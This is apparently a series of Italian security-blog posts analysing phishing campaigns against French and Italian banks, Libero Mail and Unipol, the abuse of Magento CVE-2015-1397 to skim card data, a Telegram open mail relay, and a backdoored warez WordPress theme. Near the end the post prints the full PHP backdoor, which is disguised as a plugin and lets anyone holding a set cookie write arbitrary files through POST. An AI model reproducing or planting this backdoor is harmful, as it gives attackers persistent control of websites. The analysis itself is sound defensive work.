Articoli di approfondimento sul Phishing Italiano e Internazionale con nozioni tecniche e metodi di prevenzione.

Gli accertamenti svolti nell’ultimo mese hanno portato all’individuazione di un nuovo sito di Phishing a danno degli utenti della banca online francese Hello Bank, appartenente al gruppo BNP Paribas.

Il sito fraudolento riporta il logo e la grafica del sito originale e la frode mira a carpire le credenziali d’accesso degli utenti sul portale.

 

Una volta inserite le credenziali l’utente viene reindirizzato sul sito legittimo di Hello Bank.

 

 

L’analisi dettagliata del caso ha permesso di identificare il kit di phishing adoperato dal phisher nel quale si evidenza la presenza di un file php che gestisce le credenziali sottratte alle vittime che vengono inviate ad un indirizzo eMail specifico. Ha inoltre consentito di rilevare particolari comuni a più attacchi a danno di Hello Bank, condizione che porta ad ipotizzare che tali azioni siano ad opera di uno specifico gruppo al momento concentrato su la questa banca online.

magento-logo

I Phisher nel corso da fine 2015 fino ad oggi sfruttano in maniera importante i siti internet con il CMS Magento a seguito della pubblicazione della vulnerabilità CVE-2015-1397. Questa vulnerabilità permette ad un malintenzionato di creare un nuovo utente con i permessi di amministratore, registriamo una media di 3 nuovi casi di Phishing giornalieri che sfruttano questa vulnerabilità.

Il CMS Magento viene fortemente utilizzato per creare dei siti di eCommerce, conseguentemente le informazioni presenti nel Database possono essere preziose per un malintenzionato.

Solitamente gli attaccanti una volta ottenuto i permessi di amministratore si limitano a caricare un Plugin che gli permette di editare i file esistenti, alterando quindi la struttura del sito internet al fine di caricare una webshel e il kit di Phishing.

Ma come è già capitato in passato con il CMS PrestaShop, nell’ultimo periodo abbiamo rilevato dei tentativi di alterazione del codice sorgente del CMS o di estrazione di dati sensibili dal Database.

magento_stealing_information

Grazie alla collaborazione di un Webmaster abbiamo analizzato tutti i file presenti nel dominio, rilevando la presenza di un kit automatico che permette di estrarre le seguenti informazioni:

  • Username e Password (hash) degli amministratori;
  • Configurazione del Database del CMS (Host, Username, Password);
  • Username e Password (hash) degli utenti registrati sul sito;
  • Carte di Credito memorizzate nel Database (solo se il CMS non si appoggia a servizi esterni come PayPal);
  • Indirizzi degli utenti.

Inoltre viene alterata la struttura del CMS creando un invio automatico delle Carte di Credito inserite dal legittimo utente in fase di registrazione.

 

magento_alterazione_codice_sorgente_cdc

Il file /app/code/core/Mage/Payment/Model/Method/Cc.php viene alternato includendo come visibile nello screenshot precedente una porzione di codice che acquisisce i dati della Carta di Credito inserita dall’utente e la invia via eMail al Phisher. L’eMail al fine di non essere identificata da un eventuale scanner è stata riportata con la codifica base64, la funzione PHP base64_decode() provvederà successivamente alla decodifica dell’indirizzo.

Quest’ultima è una operazione che permette al Phisher di ottenere i dati di nuove carte di credito in tempo reale anche successivamente all’aggiornamento e relativa bonifica del CMS. Poiché purtroppo si tende ad aggiornare Magento e a eliminare utenti malevoli senza controllare la struttura dell’intero sito internet.

 

magento-auto-exploiter

 

La “firma” dell’attaccante, come visibile nella porzione di codice sopra mostrata, fa riferimento ad una sviluppatrice indonesiana, presente sia sui social, dove pubblicizza i suoi tools, che su Zone-H, forum dedicati all’hacking ed al carding, nonché portali di ingaggio di freelance.
E’ opera sua il tools per Windows in grado di eseguire in maniera automatica la modifica del file Cc.php su una lista predefinita di siti forniti. Tool che oltre a modificare il File System del CMS Magento estrapola le statistiche di vendita con l’importo totale degli ordini effettuati sul sito e la media degli ordini, verifica inoltre se è stato impostato un server SMTP per l’invio dell’eMail, verificando inoltre la funzionalità del server SMTP poichè può tornare utile ad un malintenzionato per inviare ulteriori eMail di scam da nuovi server che non sono presenti nelle BlackList RBL.

Nei giorni scorsi si sono registrati nuovi tentativi di frode a danno di Caisse d’Allocations Familiales, comunemente chiamato CAF.

Il fondo assegni familiari è un’ organizzazione che sostiene le famiglie con situazioni di precarietà.

In questo caso i  criminali hanno realizzato un tentativo di frode attraverso una pagina clone posizionata in un sito violato, Il Comune di Pisa.

Continua a leggere

Negli ultimi giorni D3Lab ha individuato pagine di phishing volte a colpire un nuovo ente bancario francese, la Société Générale, settima banca nella classifica per capitalizzazioni dei gruppi bancari della zona Euro, in cui favorisce lo sviluppo del commercio e dell’industria francese.

Continua a leggere

Libero Mail Phishing

Dallo scorso 24 Ottobre è attiva una campagna di Phishing ai danni degli utenti Libero Mail finalizzata all’acquisizione esclusiva delle credeziali dell’account di posta elettronica. Il Phisher per ingannare maggiormente la vittima ha creato il dominio Ad hoc login-webmail-libero.com che può far pensare ad un sito autentico.

Il Whois del dominio ci riporta che è stato sfruttato un servizio di Privacy Protection per nascondere il proprietario del dominio.

Creation Date: 2016-10-06T18:43:00.00Z
Registrar Registration Expiration Date: 2017-10-06T18:43:00.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Reseller: NAMECHEAP.COM
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: WHOISGUARD PROTECTED
Registrant Organization: WHOISGUARD, INC.
Registrant Street: P.O. BOX 0823-03411
Registrant City: PANAMA
Registrant State/Province: PANAMA
Registrant Postal Code: 0
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext:
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: [email protected]

Analizzando il kit di Phishing rileviamo che è stato realizzato con l’intento di eludere le BlackList dei filtri anti-phishing grazie alla generazione random di url.

L’utente caduto nella trappola verrà indirizzato ad una finta pagina che gli conferma il corretto inserimento dei dati, anche se il kit non prevede realmente la verifica dell’username e delle password, e infine rediretto verso il sito ufficiale di Libero.

Libero Mail Phishing Verifica Credenziali

Attraverso l’attività di analisi del tentativo di phishing è stato possibile recuperare le credenziali carpite dai criminali, dalla cui analisi si rileva la presenza di:

  • 418 eMail @libero.it;
  • 5 eMail @inwind.it;
  • 2 eMail @hotmail.it
  • 2 eMail @iol.it;
  • 1 eMail @gmail.com.

E l’inserimento di 558 inserimenti di password, così composte:

  • 13 password contenti un simbolo (@, !, #, ecc)
  • 53 password composte esclusivamente da numeri;
  • 30 password composte da almeno una lettera maiuscola;
  • 306 password composte esclusivamente da letture minuscole;
  • Nessuna password generata tramite una funzione random.

Le credenziali sottratte verranno quasi sicuramente utilizzate per inviare ulteriore Phishing o Spam ad altri utenti o alle rubriche eMail salvati all’interno degli account sottratti.

screen_2

 

Nell’attività di analisi del Phishing abbiamo rilevato l’utilizzo del server eMail di Telegram e della loro casella di Supporto per inviare Phishing ai danni degli utenti Apple.

Nelle procedure consolidate di analisi del Phishing che svolgiamo da quattro anni lo scorso 4 Ottobre verificando una eMail di Phishing ai danni degli utenti Apple abbiamo notato l’insolito mittente “[email protected]”. Insolito perché usualmente il mittente di una eMail di Phishing viene falsificato per rendere la comunicazione ancor più veritiera con l’eMail dell’ente in oggetto. In questo caso una eMail che potrebbe ingannare maggiormente l’utente sarebbe stata: [email protected]/.com. Telegram nonostante sia nella TOP 50 delle applicazioni maggiormente scaricate nell’Apple Store non ha certamente collegamenti societari con Apple.

Analizzando successivamente l’header della mail e più precisamente i nodi di rete coinvolti si nota che la mail di Phishing è stata inviata all’effettivo mail server di Telegram da una VPS britannica ed infine consegnata al destinatario. Il server eMail di Telegram “mail.telegram.org” avente IP 149.154.167.33 risulta quindi coinvolto nell’invio di Phishing.Mail Ops Telegram

Anche una ulteriore analisi attraverso un Reverse DNS ci conferma che all’IP 149.154.167.33 è associato il sotto-dominio mail.telegram.org

ping_dig_nslookup

Verificando inoltre le zone DNS del dominio telegram.org troviamo un ulteriore conferma dell’autenticità del sotto-dominio e del server sfruttato per inviare l’eMail.

dig_any

Pertanto il Server Mail e un Account Mail di Telegram è stato sfruttato per inviare Phishing!

Ma come è stato possibile? Il Phisher ha ottenuto la password dell’account [email protected] e sfruttato per inviare la posta?

No, come si può vedere dall’immagine di apertura il server SMTP non era configurato correttamente e non richiedere l’autenticazione, funzionando come un Open Mail Relay! 

Un Open Mail Relay è un server SMTP configurato in modo tale che permetta a chiunque di inviare eMail attraverso esso, questa era la configurazione di default nel passato dei principali server mail ma a seguito dell’utilizzo fraudolento da parte di spammer e phisher ad oggi viene normalmente chiesta l’autenticazione per l’invio di una eMail. Risultava quindi possibile inviare eMail attraverso la casella [email protected] a chiunque.

A conferma di tale ipotesi vediamo di seguito una scansione positiva eseguita con il noto software nmap e lo script per la verifica dell’Open Relay.

nmap_open_relay

Abbiamo provveduto ad avvisare Telegram alle 20 del 4 Ottobre, e dopo soli 30 minuti, con grande tempestività, il team di Telegram era già intervenuto riconfigurato il loro server SMTP, rispondendo alla nostra segnalazione ringraziandoci.

I Phisher hanno usato il server SMTP per inviare Phishing, ma questa errata configurazione poteva certamente essere sfruttata per inviare comunicazioni di carattere amministrativo (Man in the Mail) o uno Spear Phishing mirato ad altri dipendenti Telegram o società che collaborano strettamente con loro.

unipol_login_phishing

Il Phishing è una truffa informatica eseguita tramite una eMail, anche se non mancano i casi in cui il vettore della truffa siano i brevi di messaggi di testo o altri sistemi di comunicazione, che falsifica una comunicazione del proprio Istituto Bancario al fine di frodare il destinatario. Al destinatario viene chiesto di fornire informazioni sensibili (Credenziali, Carta di Credito, Token OTP, ecc) oltre alle proprie generalità.

D3Lab opera attivamente dal 2011 nell’analisi e nel contrasto del Phishing dapprima in Italia ma recentemente anche in altri paesi della comunità Europea, analizzando mediamente oltre 90mila casi univoci al mese di tentativi di Phishing.

I Phisher comunemente concentrano le loro forze solitamente su enti importanti quali PayPal, Apple, Unicredit, Intesa San Paolo, Poste Italiane ecc poiché il bacino di vittime sarà sicuramente maggiore rispetto ad altre piccole realtà bancarie e si presume maggior facilità nell’attrarre delle vittime.

unipol_login_phishing_2

Ma i Phisher per differenziarsi escono a volte dagli schemi, colpendo un target con un bacino di clienti inferiore. Una scelta che viene fatta per scoprire nuovi “territori” vergini o quasi e per sondare il quantitativo di potenziali vittime. Se il target porta interessanti novità il Phisher migliora il kit di Phishing perfezionando il layout web, la comunicazione via eMail, il dominio (sfruttando SSL o creando domini ad-hoc) per ingannare maggiormente la vittima.

Unipol appartiene sicuramente a questa casistica, nel corso del 2016 i casi a suo danno sono aumentanti e il Kit sfruttato per effettuare il Phishing si è perfezionato includendo anche la richiesta del codice OTP oltre a riprodurre perfettamente la pagina di login. Il grafico seguente confronta i casi da noi identificati dal 2012 ad oggi, rispetto al 2015 il 2016 vede un trend di crescita maggiore del 50%.

grafico_phishing_unipol

 

Il Kit di Phishing individuato stamani, a conferma di quanto affermato in precedenza, è probabilmente ad opera dello stesso Team che effettua Phishing ai danni di Unicredit. Infatti analizzando la pagina di richiesta del codice OTP, a seguito del login, troviamo un errato titolo che riporta “Unicredit Conti correnti online”. Probabilmente per la creazione di questo kit è stato sfruttato un template Unicredit e poi personalizzato ad-hoc per Unipol ma il Phisher si è scordato di variare il titolo della pagina.

unicredit_unipol_cedacri

È quindi importante effettuare attività di contrasto e di sensibilizzazione della clientela attraverso il customer service al fine di ridurre i rischi.

pagina fraudolenta Crédit Mutuel

Crédit Mutuel è uno dei principali gruppi bancari francesi, partecipato diversi altri istituti e gruppi bancari.

La presenza di più istituti bancari in un unico gruppo, che fanno magari uso della medesima piattaforma di internet banking, consente ai phisher più agguerriti di realizzare campagne di phishing volte a colpire con l’invio di una singola mail i correntisti dei vari istituti facenti parte del gruppo.

Il monitoraggio odierno ha permesso di rilevare nella prime ore della notte un caso di phishing che sfruttando tale schema va ad impattare sui clienti di

  • Credit Mutuel de Bretagne (CMB)
  • Credit Mutuel Massif Central (CMMC)
  • Credit Mutuel Sud Ouest (CMSO)
  • BPE
  • Arkéa Banque Privée (ABP)
  • Fortunéo
  • BEMIX

Continua a leggere

seconda pag. phishing CNAMTS

In Francia la previdenza sociale è suddivisa in tre settori principali:

  • malattia, maternità, invalidità e morte, infortuni sul lavoro e malattie professionali;
  • vecchiaia;
  • famiglia;

gestiti da tre differenti enti:

  • la Cassa nazionale di assicurazione malattia dei lavoratori dipendenti (Caisse nationale d’assurance maladie maternitédes des travailleurs salariés), abbreviato CNAMTS, si occupa del primo;
  • la Cassa nazionale di assicurazione vecchiaia (Caisse nationale d’assurance vieillesse, CNAV ) del secondo;
  • la Cassa nazionale degli assegni familiari (Caisse nationale des allocations familiales, CNAF ) del terzo.

Monitorando il phishing internazionale D3Lab aveva rilevato sin dal 2013 l’interesse dei criminali per la Caisse nationale des allocations familiales,

phishing CNAF url rilevati Continua a leggere

 

wordpress_themes_warez_backdoor

È ormai una notizia nota che i Temi o i Plugin di WordPress scaricati in maniera illegale, senza corrispondere il corretto compenso allo sviluppatore, contengano spesso Backdoor o Shell nascoste pronte per essere sfruttate per accedere al sito. Nonostante ciò la diffusione di tale materiale è ancora elevata e non mancano certamente gli utilizzatori che pur di risparmiare qualche euro mettano a repentaglio la sicurezza dei propri siti.

La scorsa settimana un sito internet Australiano è stato attaccato e sfruttato per diffondere Phishing ai danni di CartaSi. In collaborazione con il provider abbiamo analizzato il sito web e i relativi LOG per permettergli di contrastare l’accesso abusivo al dominio. Fin da subito abbiamo identificato l’utilizzo di un tema commerciale probabilmente scaricato da siti warez, vista la presenza del file: MafiaShare.net.txt nella directory del tema.

2016-09-28_screenshot_1519090

Successivamente analizzando tutti i file che compongono il tema abbiamo rilevato una backdoord nascosta utilizzabile solo a seguito di autenticazione, realizzata attraverso la lettura di Cookie. La backdoor scritta in PHP permette ad un utente malevolo di scrivere nuovi file sulla spazio web con contenuto arbitrario.

Il file in analisi, che vedete nell’immagine di apertura, è così composto:


/*
Plugin Name: [OMESSO]
Description: A plugin that show posts in column, featured image suported. Responsive supported.
Version: 1.0
Author: [OMESSO]
Author URI: http://www.[OMESSO].com/
*/

<?php
$trenz=$_COOKIE['cookie_name'];
$jban1=$_POST["jban1"];
$jban2=$_POST["jban2"];
$wp_editer=$_POST["wp_editer"];
$jban3=$_POST["jban3"];
if ((isset($trenz)) and ($trenz=="mypassword") and (isset($jban1)))
{
$wp_hasher=  $wp_editer($jban1,$jban2);
$jban3=stripslashes($jban3);
fwrite ($wp_hasher,$jban3);
}
if ((isset($trenz)) and ($trenz=="test"))
{
echo "Testing";
}
?>

Accedendo al fine senza inviare alcuna richiesta POST apparirà la porzione di testo commentata, poiché non correttamente indentato, che fa presupporre la legittimità del file. Ma realmente il file permette di creare nuovi file dal contenuto ed estensione arbitrarie. Per far ciò è però fondamentale creare un Cookie denominato cookie_name contenente il valore mypassword, il precedente script identifica tale cookie e se presente proseguirà nella lavorazione dei parametri POST passati. Parametri che conterranno il nome del file e il suo contenuto.

Quando si sviluppa un sito Internet in WordPress, ma non solo, è quindi fondamentale utilizzare Temi o Plugin distribuiti dai canali ufficiali acquistando ove necessario le relative licenze.